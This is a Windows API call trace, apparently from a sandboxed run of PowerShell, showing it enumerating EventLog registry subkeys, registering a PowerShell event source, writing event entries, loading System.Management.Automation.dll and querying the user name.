	[0739.623] CoTaskMemFree (pv=0x0) 
	[0739.623] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.623] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.623] CoTaskMemFree (pv=0x1f9450) 
	[0739.623] CoTaskMemFree (pv=0x0) 
	[0739.623] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.624] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.624] CoTaskMemFree (pv=0x1f9450) 
	[0739.624] CoTaskMemFree (pv=0x0) 
	[0739.624] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.624] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.624] CoTaskMemFree (pv=0x1f9450) 
	[0739.624] CoTaskMemFree (pv=0x0) 
	[0739.624] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.624] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.624] CoTaskMemFree (pv=0x1f9450) 
	[0739.624] CoTaskMemFree (pv=0x0) 
	[0739.624] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x344) returned 0x0
	[0739.624] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.624] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x348) returned 0x0
	[0739.625] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x34c) returned 0x0
	[0739.625] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x350) returned 0x0
	[0739.625] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x354) returned 0x0
	[0739.625] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x358) returned 0x0
	[0739.626] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.626] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x35c) returned 0x0
	[0739.626] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.626] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x360) returned 0x0
	[0739.626] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.626] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x364) returned 0x0
	[0739.626] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x368) returned 0x0
	[0739.626] RegCloseKey (hKey=0x368) returned 0x0
	[0739.627] RegCloseKey (hKey=0x340) returned 0x0
	[0739.627] RegCloseKey (hKey=0x364) returned 0x0
	[0739.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed268 | out: phkResult=0xed268*=0x364) returned 0x0
	[0739.628] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.628] CoTaskMemFree (pv=0x0) 
	[0739.628] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.628] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.628] CoTaskMemFree (pv=0x1f9450) 
	[0739.628] CoTaskMemFree (pv=0x0) 
	[0739.628] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.628] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.628] CoTaskMemFree (pv=0x1f9450) 
	[0739.628] CoTaskMemFree (pv=0x0) 
	[0739.628] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.628] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.629] CoTaskMemFree (pv=0x1f9450) 
	[0739.629] CoTaskMemFree (pv=0x0) 
	[0739.629] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.629] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.629] CoTaskMemFree (pv=0x1f9450) 
	[0739.629] CoTaskMemFree (pv=0x0) 
	[0739.629] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.629] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.629] CoTaskMemFree (pv=0x1f9450) 
	[0739.629] CoTaskMemFree (pv=0x0) 
	[0739.629] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.629] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.629] CoTaskMemFree (pv=0x1f9450) 
	[0739.629] CoTaskMemFree (pv=0x0) 
	[0739.629] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.629] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.630] CoTaskMemFree (pv=0x1f9450) 
	[0739.630] CoTaskMemFree (pv=0x0) 
	[0739.630] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.630] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.630] CoTaskMemFree (pv=0x1f9450) 
	[0739.630] CoTaskMemFree (pv=0x0) 
	[0739.630] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.630] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.630] CoTaskMemFree (pv=0x1f9450) 
	[0739.630] CoTaskMemFree (pv=0x0) 
	[0739.630] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x340) returned 0x0
	[0739.630] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x368) returned 0x0
	[0739.631] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x36c) returned 0x0
	[0739.631] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x370) returned 0x0
	[0739.631] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x374) returned 0x0
	[0739.631] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.631] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x378) returned 0x0
	[0739.632] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.632] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x37c) returned 0x0
	[0739.632] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.632] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x380) returned 0x0
	[0739.632] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x0) returned 0x2
	[0739.632] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x384) returned 0x0
	[0739.632] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2c8 | out: phkResult=0xed2c8*=0x388) returned 0x0
	[0739.632] RegCloseKey (hKey=0x388) returned 0x0
	[0739.632] RegCloseKey (hKey=0x364) returned 0x0
	[0739.633] RegCloseKey (hKey=0x384) returned 0x0
	[0739.634] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed238 | out: phkResult=0xed238*=0x384) returned 0x0
	[0739.634] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.634] CoTaskMemFree (pv=0x0) 
	[0739.634] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.634] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.634] CoTaskMemFree (pv=0x1f9450) 
	[0739.634] CoTaskMemFree (pv=0x0) 
	[0739.634] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.634] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.634] CoTaskMemFree (pv=0x1f9450) 
	[0739.634] CoTaskMemFree (pv=0x0) 
	[0739.634] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.635] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.635] CoTaskMemFree (pv=0x1f9450) 
	[0739.635] CoTaskMemFree (pv=0x0) 
	[0739.635] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.635] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.635] CoTaskMemFree (pv=0x1f9450) 
	[0739.635] CoTaskMemFree (pv=0x0) 
	[0739.635] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.635] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.635] CoTaskMemFree (pv=0x1f9450) 
	[0739.635] CoTaskMemFree (pv=0x0) 
	[0739.635] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.635] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.635] CoTaskMemFree (pv=0x1f9450) 
	[0739.635] CoTaskMemFree (pv=0x0) 
	[0739.636] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.636] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.636] CoTaskMemFree (pv=0x1f9450) 
	[0739.636] CoTaskMemFree (pv=0x0) 
	[0739.636] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.636] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.636] CoTaskMemFree (pv=0x1f9450) 
	[0739.636] CoTaskMemFree (pv=0x0) 
	[0739.636] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.636] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x1f9450, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.636] CoTaskMemFree (pv=0x1f9450) 
	[0739.636] CoTaskMemFree (pv=0x0) 
	[0739.636] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x364) returned 0x0
	[0739.636] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.637] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x388) returned 0x0
	[0739.637] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.637] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x38c) returned 0x0
	[0739.637] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.637] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x390) returned 0x0
	[0739.637] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.637] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x394) returned 0x0
	[0739.637] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.637] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x398) returned 0x0
	[0739.638] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.638] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x39c) returned 0x0
	[0739.638] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.638] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x3a0) returned 0x0
	[0739.638] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x0) returned 0x2
	[0739.638] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x3a4) returned 0x0
	[0739.638] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed298 | out: phkResult=0xed298*=0x3a8) returned 0x0
	[0739.638] RegCloseKey (hKey=0x3a8) returned 0x0
	[0739.639] RegCloseKey (hKey=0x384) returned 0x0
	[0739.639] RegCloseKey (hKey=0x3a4) returned 0x0
	[0739.644] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b840008
	[0740.901] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3054130*="WSMan", lpRawData=0x3053ea0) returned 1
	[0740.905] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0740.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.905] CoTaskMemFree (pv=0x242e50) 
	[0740.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.908] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0740.908] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0740.908] CoTaskMemFree (pv=0x1b9a61c0) 
	[0740.908] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0740.908] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0740.908] CoTaskMemFree (pv=0x1f9450) 
	[0740.909] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3059668*="Alias", lpRawData=0x30593f8) returned 1
	[0740.916] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0740.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.916] CoTaskMemFree (pv=0x242e50) 
	[0740.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.918] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0740.918] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0740.919] CoTaskMemFree (pv=0x1b9a61c0) 
	[0740.919] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0740.919] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0740.919] CoTaskMemFree (pv=0x1f9450) 
